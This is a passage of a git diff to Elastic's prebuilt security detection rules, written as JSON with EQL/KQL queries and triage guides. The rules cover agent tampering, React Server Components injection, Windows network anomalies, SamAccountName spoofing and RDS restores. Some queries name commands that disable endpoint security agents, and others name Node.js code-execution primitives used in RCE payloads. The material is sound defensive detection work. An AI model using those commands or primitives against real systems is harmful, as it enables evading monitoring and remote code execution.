- "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "b45ab1d2-712f-4f01-a751-df3826969807", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1548", - "name": "Abuse Elevation Control Mechanism", - "reference": "https://attack.mitre.org/techniques/T1548/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "b45ab1d2-712f-4f01-a751-df3826969807_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_108.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_108.json deleted file mode 100644 index 4be59786368..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_108.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Elastic Agent Service Terminated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Elastic Agent Service Terminated\n\nThe Elastic Agent is a crucial component for monitoring and securing endpoints across various operating systems. It ensures continuous security oversight by collecting and analyzing data. Adversaries may attempt to disable this agent to evade detection, compromising system defenses. The detection rule identifies suspicious termination activities by monitoring specific processes and commands across Windows, Linux, and macOS, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the event logs to identify the exact process and command used to terminate the Elastic Agent, focusing on the process names and arguments such as \"net.exe\", \"sc.exe\", \"systemctl\", and \"pkill\" with arguments like \"stop\", \"uninstall\", or \"disable\".\n- Check the timeline of events around the termination to identify any preceding suspicious activities or anomalies that might indicate an adversary's presence or actions.\n- Investigate the user account associated with the process termination to determine if it was authorized or if there are signs of account compromise.\n- Examine the host for any other signs of tampering or compromise, such as unauthorized changes to system configurations or the presence of other malicious processes.\n- Verify the current status of the Elastic Agent on the affected host and attempt to restart it if it is not running, ensuring that security monitoring is restored.\n- Correlate this event with other alerts or logs from the same host or network to identify potential patterns or coordinated attack activities.\n\n### False positive analysis\n\n- Routine maintenance activities may trigger the rule if administrators use commands like systemctl or service to stop the Elastic Agent for updates or configuration changes. To manage this, create exceptions for known maintenance windows or authorized personnel.\n- Automated scripts or deployment tools that temporarily disable the Elastic Agent during software installations or updates can cause false positives. Identify these scripts and whitelist their execution paths or specific arguments.\n- Testing environments where Elastic Agent is frequently started and stopped for development purposes might generate alerts. Exclude these environments by specifying their hostnames or IP addresses in the rule exceptions.\n- Security tools or processes that interact with the Elastic Agent, such as backup solutions or system monitoring tools, might inadvertently stop the service. Review these interactions and adjust the rule to ignore specific process names or arguments associated with these tools.\n- User-initiated actions, such as troubleshooting or system performance optimization, may involve stopping the Elastic Agent. Educate users on the impact of these actions and establish a protocol for notifying the security team when such actions are necessary.\n\n### Response and remediation\n\n- Immediately isolate the affected host from the network to prevent further unauthorized access or potential lateral movement by adversaries.\n- Verify the status of the Elastic Agent on the affected host and attempt to restart the service. If the service fails to restart, investigate potential causes such as corrupted files or missing dependencies.\n- Conduct a thorough review of recent process execution logs on the affected host to identify any unauthorized or suspicious activities that may have led to the termination of the Elastic Agent.\n- If malicious activity is confirmed, perform a comprehensive malware scan and remove any identified threats. Ensure that the host is clean before reconnecting it to the network.\n- Review and update endpoint security configurations to prevent unauthorized termination of security services. This may include implementing stricter access controls or using application whitelisting.\n- Escalate the incident to the security operations team for further analysis and to determine if additional hosts are affected or if there is a broader security incident underway.\n- Document the incident, including all actions taken and findings, to enhance future response efforts and update incident response plans as necessary.", - "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\"))\nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\", \"service\") and\n process.args : \"elastic-agent\" and\n process.args : (\"stop\", \"disable\"))\n or\n /* pkill , killall used to stop Elastic Agent on Linux */\n ( event.type == \"end\" and process.name : (\"pkill\", \"killall\") and process.args: \"elastic-agent\")\n or\n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and\n event.action : \"end\"))\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", - "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 108 - }, - "id": "b627cd12-dac4-11ec-9582-f661ea17fbcd_108", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e_1.json b/packages/security_detection_engine/kibana/security_rule/b9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e_1.json new file mode 100644 index 00000000000..0177c9f1bcc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e_1.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule detects anomalous patterns in React Server Components (RSC) Flight protocol data streams that may indicate code injection or exploitation attempts. The Flight protocol is used by React and Next.js for server-client communication, and should never contain Node.js code execution primitives like child_process, fs module calls, or eval patterns. This building block rule casts a wider net to identify suspicious payloads that warrant further investigation.", + "from": "now-119m", + "index": [ + "logs-network_traffic.http*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Anomalous React Server Components Flight Data Patterns", + "query": "network where http.request.method == \"POST\" and http.response.status_code != 200 and\n(\n // Node.js child_process module\n (\n http.request.body.content like~ \"*require('child_process')*\" or\n http.request.body.content like~ \"*require(\\\"child_process\\\")*\" or\n http.request.body.content like~ \"*child_process*\" and http.request.body.content like~ \"*.exec*\"\n ) or\n // Node.js synchronous execution methods\n (\n http.request.body.content like~ \"*.execSync(*\" or\n http.request.body.content like~ \"*.spawnSync(*\" or\n http.request.body.content like~ \"*.execFileSync(*\"\n ) or\n // Node.js file system operations - suspicious in RSC context\n (\n http.request.body.content like~ \"*require('fs')*\" or\n http.request.body.content like~ \"*require(\\\"fs\\\")*\" or\n http.request.body.content like~ \"*.readFileSync(*\" or\n http.request.body.content like~ \"*.writeFileSync(*\" or\n http.request.body.content like~ \"*.unlinkSync(*\"\n ) or\n // Process and module access patterns used in exploitation\n (\n http.request.body.content like~ \"*process.mainModule*\" or\n http.request.body.content like~ \"*process.binding*\" or\n http.request.body.content like~ \"*process.dlopen*\"\n ) or\n // JavaScript code execution primitives\n (\n http.request.body.content like~ \"*eval(*\" and http.request.body.content like~ \"*require*\" or\n http.request.body.content like~ \"*Function(*\" and http.request.body.content like~ \"*return*\"\n ) or\n // Generic prototype pollution indicators\n (\n http.request.body.content like~ \"*prototype*\" and http.request.body.content like~ \"*constructor*\"\n )\n)\n", + "references": [ + "https://react.dev/reference/rsc/server-components", + "https://github.com/facebook/react/blob/main/packages/react-server/src/ReactFlightServer.js", + "https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182", + "https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/", + "https://nextjs.org/docs/app/building-your-application/rendering/server-components", + "https://tonyalicea.dev/blog/understanding-react-server-components/" + ], + "related_integrations": [ + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "http.request.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "http.request.method", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "b9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e", + "severity": "low", + "tags": [ + "Domain: Network", + "Domain: Application", + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Network Packet Capture", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "b9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ba342eb2-583c-439f-b04d-1fdd7c1417cc_210.json b/packages/security_detection_engine/kibana/security_rule/ba342eb2-583c-439f-b04d-1fdd7c1417cc_210.json new file mode 100644 index 00000000000..b50cc7dc742 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ba342eb2-583c-439f-b04d-1fdd7c1417cc_210.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "Identifies Windows processes that do not usually use the network but have unexpected network activity, which can indicate command-and-control, lateral movement, persistence, or data exfiltration activity. A process with unusual network activity can denote process exploitation or injection, where the process is used to run persistence mechanisms that allow a malicious actor remote access or control of the host, data exfiltration, and execution of unauthorized network applications.", + "false_positives": [ + "A newly installed program or one that rarely uses the network could trigger this alert." + ], + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": [ + "v3_windows_anomalous_network_activity" + ], + "name": "Unusual Windows Network Activity", + "note": "## Triage and analysis\n\n### Investigating Unusual Windows Network Activity\nDetection alerts from this rule indicate the presence of network activity from a Windows process for which network activity is very unusual. Here are some possible avenues of investigation:\n- Consider the IP addresses, protocol and ports. Are these used by normal but infrequent network workflows? Are they expected or unexpected?\n- If the destination IP address is remote or external, does it associate with an expected domain, organization or geography? Note: avoid interacting directly with suspected malicious IP addresses.\n- Consider the user as identified by the username field. Is this network activity part of an expected workflow for the user who ran the program?\n- Examine the history of execution. If this process only manifested recently, it might be part of a new software package. If it has a consistent cadence (for example if it runs monthly or quarterly), it might be part of a monthly or quarterly business process.\n- Examine the process arguments, title and working directory. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Consider the same for the parent process. If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n- If you have file hash values in the event data, and you suspect malware, you can optionally run a search for the file hash to see if the file is identified as malware by anti-malware tools.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "risk_score": 21, + "rule_id": "ba342eb2-583c-439f-b04d-1fdd7c1417cc", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Windows\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Windows Integration Setup\nThe Windows integration allows you to monitor the Windows OS, services, applications, and more.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"windows\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cWindows\u201d and select the integration to see more details about it.\n- Click \u201cAdd Windows\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cwindows\u201d to an existing or a new agent policy, and deploy the agent on your system from which windows log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 210 + }, + "id": "ba342eb2-583c-439f-b04d-1fdd7c1417cc_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_210.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_210.json index f429e7939b7..80877cae3c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_210.json +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_211.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_211.json index 48cf7aa35cc..11bf2817c12 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_211.json +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_211.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_211.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_211.json deleted file mode 100644 index d0622741b85..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_211.json +++ /dev/null @@ -1,117 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Potential Privileged Escalation via SamAccountName Spoofing", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Privileged Escalation via SamAccountName Spoofing\n\nIn Active Directory environments, the samAccountName attribute is crucial for identifying user and computer accounts. Adversaries may exploit vulnerabilities like CVE-2021-42278 to spoof this attribute, potentially elevating privileges by renaming computer accounts to mimic domain controllers. The detection rule identifies suspicious renaming events, where a machine account is altered to resemble a user account, signaling possible privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the event logs to confirm the occurrence of a \"renamed-user-account\" action, focusing on entries where the OldTargetUserName ends with a \"$\" and the NewTargetUserName does not, indicating a potential spoofing attempt.\n- Identify the source of the rename event by examining the event logs for the user or system that initiated the change, and determine if it aligns with expected administrative activity.\n- Check the history of the NewTargetUserName to see if it has been used in any recent authentication attempts or privileged operations, which could indicate malicious intent.\n- Investigate the associated IP address and hostname from which the rename action was performed to determine if it is a known and trusted source within the network.\n- Correlate the event with other security alerts or logs to identify any patterns or additional suspicious activities that might suggest a broader attack campaign.\n- Assess the potential impact by determining if the renamed account has been granted elevated privileges or access to sensitive resources since the rename event occurred.\n\n### False positive analysis\n\n- Routine administrative tasks involving legitimate renaming of computer accounts can trigger false positives. To manage this, create exceptions for known administrative activities by excluding specific administrator accounts or service accounts from the detection rule.\n- Automated processes or scripts that rename computer accounts as part of regular maintenance or deployment procedures may also cause false alerts. Identify these processes and exclude their associated accounts or event patterns from the rule.\n- Temporary renaming of computer accounts for troubleshooting or testing purposes can be mistaken for suspicious activity. Document and exclude these temporary changes by maintaining a list of authorized personnel and their activities.\n- Changes made by trusted third-party software or management tools that interact with Active Directory should be reviewed and, if deemed safe, excluded from triggering alerts by specifying the tool's account or signature in the rule exceptions.\n\n### Response and remediation\n\n- Immediately isolate the affected machine from the network to prevent further unauthorized access or lateral movement within the domain.\n- Revert any unauthorized changes to the samAccountName attribute by renaming the affected computer account back to its original name.\n- Conduct a thorough review of recent changes in Active Directory, focusing on user and computer account modifications, to identify any other potentially compromised accounts.\n- Reset passwords for the affected machine account and any other accounts that may have been accessed or modified during the incident.\n- Apply the latest security patches and updates to all domain controllers and critical systems to mitigate vulnerabilities like CVE-2021-42278.\n- Enhance monitoring and logging for Active Directory events, specifically focusing on account renaming activities, to detect similar threats in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.", - "query": "iam where event.action == \"renamed-user-account\" and\n /* machine account name renamed to user like account name */\n winlog.event_data.OldTargetUserName : \"*$\" and not winlog.event_data.NewTargetUserName : \"*$\"\n", - "references": [ - "https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e", - "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", - "https://github.com/cube0x0/noPac", - "https://twitter.com/exploitph/status/1469157138928914432", - "https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.NewTargetUserName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.OldTargetUserName", - "type": "unknown" - } - ], - "risk_score": 73, - "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Use Case: Vulnerability", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1068", - "name": "Exploitation for Privilege Escalation", - "reference": "https://attack.mitre.org/techniques/T1068/" - }, - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.002", - "name": "Domain Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 211 - }, - "id": "bdcf646b-08d4-492c-870a-6c04e3700034_211", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_211.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_211.json new file mode 100644 index 00000000000..eae4f7390a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_211.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Austin Songer", + "Elastic" + ], + "description": "Identifies the restoration of an AWS RDS database instance from a snapshot or S3 backup. Adversaries with access to valid credentials may restore copies of existing databases to bypass logging and monitoring controls or to exfiltrate sensitive data from a duplicated environment. This rule detects successful restoration operations using \"RestoreDBInstanceFromDBSnapshot\" or \"RestoreDBInstanceFromS3\", which may indicate unauthorized data access or post-compromise defense evasion.", + "false_positives": [ + "Restoring an RDS DB instance may be performed legitimately during troubleshooting, development refresh processes, migrations, or disaster-recovery drills. Validate the user identity, source IP, automation context, and whether the restoration aligns with a known maintenance or testing workflow before treating the event as suspicious. Expected behavior can be exempted through rule exceptions." + ], + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS RDS DB Instance Restored", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS DB Instance Restored\n\nRestoring an RDS DB instance from a snapshot or from S3 is a powerful operation that recreates a full database environment. While legitimate for recovery, migrations, or cloning, adversaries may use restore actions to access historical data, duplicate sensitive environments, evade guardrails, or prepare for data exfiltration. \n\nThis rule detects successful invocation of `RestoreDBInstanceFromDBSnapshot` and `RestoreDBInstanceFromS3`, both of which may indicate attempts to rehydrate old datasets, bypass deletion protection, or establish a shadow environment for further malicious actions.\n\n#### Possible investigation steps\n\n- **Identify the actor and execution context**\n - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `aws.cloudtrail.user_identity.access_key_id`.\n - Check `user.name`, `source.ip`, and `user_agent.original` to determine how the restore was executed (console, CLI, automation, SDK).\n\n- **Understand what was restored and why**\n - Inspect `aws.cloudtrail.request_parameters` to identify:\n - Snapshot identifier or S3 location used as the restore source.\n - The new DB instance identifier and configuration parameters.\n - Determine:\n - Whether the snapshot/backup used for the restore contains sensitive or high-value data.\n - Whether this restore created a publicly accessible instance, changed security groups, or used unusual storage/instance classes.\n\n- **Reconstruct the activity flow**\n - Use `@timestamp` to correlate the restore event with:\n - Snapshot creation, copy, or export events.\n - IAM policy changes or privilege escalations.\n - Deletion or modification of the original database.\n - Other RDS lifecycle actions such as `ModifyDBInstance`, `DeleteDBInstance`, or backup configuration changes.\n - Look for signs of attacker staging:\n - Prior enumeration activity (`DescribeDBSnapshots`, `DescribeDBInstances`).\n - Recent logins from unusual IPs or federated sessions without MFA.\n\n- **Correlate with broader behavior**\n - Pivot in CloudTrail on:\n - The same snapshot identifier.\n - The same actor or access key ID.\n - The newly created DB instance identifier.\n - Examine:\n - Whether the restored DB was modified immediately after (e.g., security groups opened, deletion protection disabled).\n - Whether there were large-volume read operations or export actions following the restore.\n - Whether the restore is part of a pattern of parallel suspicious activity (snapshot copying, S3 backups, cross-account actions).\n\n- **Validate intent with owners**\n - Confirm with the application/database/platform teams:\n - Whether the restore was requested or part of an authorized operational workflow.\n - Whether this restore corresponds to migration, testing, DR drill, or another planned activity.\n - Whether the restored environment should exist (and for how long).\n\n### False positive analysis\n\n- **Legitimate maintenance and DR workflows**\n - Many teams restore databases for patch testing, DR validation, schema testing, or migration.\n- **Automated restore workflows**\n - CI/CD pipelines or internal automation may restore DBs to generate staging or dev environments.\n- **Third-party tooling**\n - Backup/DR solutions, migration tools, or observability platforms may restore DB instances for operational reasons. Tune based on `user_agent.original` or known service roles.\n\n### Response and remediation\n\n- **Contain the restored 